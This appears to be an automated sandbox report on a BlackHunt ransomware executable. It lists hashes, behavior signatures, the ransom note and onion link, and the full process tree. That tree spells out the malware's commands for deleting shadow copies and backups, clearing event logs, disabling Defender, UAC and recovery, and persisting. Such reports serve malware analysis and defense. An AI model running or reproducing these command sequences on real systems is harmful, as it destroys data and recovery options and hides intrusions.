Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 27s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20231222-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 18/01/2024, 22:52
Static task: static1
Behavioral task: behavioral1
- Sample: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Resource: win7-20231129-en
Behavioral task: behavioral2
- Sample: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Resource: win10v2004-20231222-en
General
- Target: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Size: 707KB
- MD5: 8f1b4a1ad35803c3e7306790ac78dadf
- SHA1: 559111015958073f9f462b82fbc1a44cdb420441
- SHA256: 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87
- SHA512: b2199fa282ad6740f3e981e6c3b92fef7bd834ac6fb42134dd7953038aee2faea72c3efdf4684e1fb2ab2c6755942ed782ca0748ef860a895390c328da8f6c07
- SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8Wvnh:6uaTmkZJ+naie5OTamgEoKxLWCoh
Malware Config
Extracted from: F:\#BlackHunt_ReadMe.hta
- http-equiv="x-ua-compatible"
- http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
- pid 10132 fsutil.exe
- pid 14728 fsutil.exe
- Key created: \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe)
Clears Windows event logs (1 TTPs, 5 IoCs)
- pid 3392 wevtutil.exe
- pid 5192 wevtutil.exe
- pid 284 wevtutil.exe
- pid 11084 wevtutil.exe
- pid 12496 wevtutil.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
- pid 9380 bcdedit.exe
- pid 9868 bcdedit.exe
- pid 9568 bcdedit.exe
- pid 10752 bcdedit.exe
Renames multiple (3370) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
- pid 10124 wbadmin.exe
- pid 14832 wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points (1 TTPs)
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation (2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe)
Adds Run key to start application (2 TTPs, 1 IoCs)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe)
Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 5: ip-api.com
Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
- pid 2112, pid_target 10808, WerFault.exe, procid_target 265
Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 (vds.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName (vds.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 (vds.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName (vds.exe)
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- pid 3928 schtasks.exe
Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
- pid 2380 vssadmin.exe
- pid 3848 vssadmin.exe
- pid 3288 vssadmin.exe
- pid 5884 vssadmin.exe
- pid 4588 vssadmin.exe
- pid 10280 vssadmin.exe
Kills process with taskkill (1 IoCs)
- pid 15676 taskkill.exe
Modifies registry class (10 IoCs)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
Runs ping.exe (1 TTPs, 1 IoCs)
- pid 13988 PING.EXE
Suspicious use of AdjustPrivilegeToken (15 IoCs)
- Token: SeDebugPrivilege, pid 1012, 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Token: SeRestorePrivilege, pid 1012, 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Token: SeBackupPrivilege, pid 1012, 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Token: SeTakeOwnershipPrivilege, pid 1012, 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Token: SeAuditPrivilege, pid 1012, 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Token: SeSecurityPrivilege, pid 1012, 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Token: SeIncBasePriorityPrivilege, pid 1012, 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
- Token: SeBackupPrivilege, pid 8436, vssvc.exe
- Token: SeRestorePrivilege, pid 8436, vssvc.exe
- Token: SeAuditPrivilege, pid 8436, vssvc.exe
- Token: SeBackupPrivilege, pid 5520, wbengine.exe
- Token: SeRestorePrivilege, pid 5520, wbengine.exe
- Token: SeSecurityPrivilege, pid 5520, wbengine.exe
- Token: SeSecurityPrivilege, pid 3392, wevtutil.exe
- Token: SeBackupPrivilege, pid 3392, wevtutil.exe
Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"
  Signatures: UAC bypass; Checks computer location settings; Checks whether UAC is enabled; Enumerates connected drives; Drops file in Program Files directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification
  PID: 1012
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    Signatures: Suspicious use of WriteProcessMemory
    PID: 4604
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      Signatures: Modifies registry class
      PID: 4028
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    Signatures: Suspicious use of WriteProcessMemory
    PID: 4632
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      Signatures: Modifies registry class
      PID: 3336
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    Signatures: Suspicious use of WriteProcessMemory
    PID: 3612
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      Signatures: Modifies registry class
      PID: 4116
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    Signatures: Suspicious use of WriteProcessMemory
    PID: 4912
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      Signatures: Adds Run key to start application
      PID: 2932
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1400
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      PID: 3592
    - C:\Windows\System32\Conhost.exe
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 640
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    Signatures: Suspicious use of WriteProcessMemory
    PID: 2548
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID: 2664
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    Signatures: Suspicious use of WriteProcessMemory
    PID: 2740
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      PID: 5016
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    PID: 3588
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
      PID: 3852
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    PID: 2680
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
      PID: 752
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    PID: 2484
    - C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      PID: 4600
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F
    PID: 1392
    - C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F
- Creates scheduled task(s)
PID:3928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:412
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1032
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4528
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2312
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2404
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4336
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:10132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3736
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3068
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:12496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2908
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6640
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:9556
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6844
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:14728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4032
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:11092
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:11684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:7684
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:15440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:10060
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:16340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14608
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:8328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"2⤵PID:12792
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:13988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:7024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:14628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:13108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:6488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:12932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:13116
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:1496
-
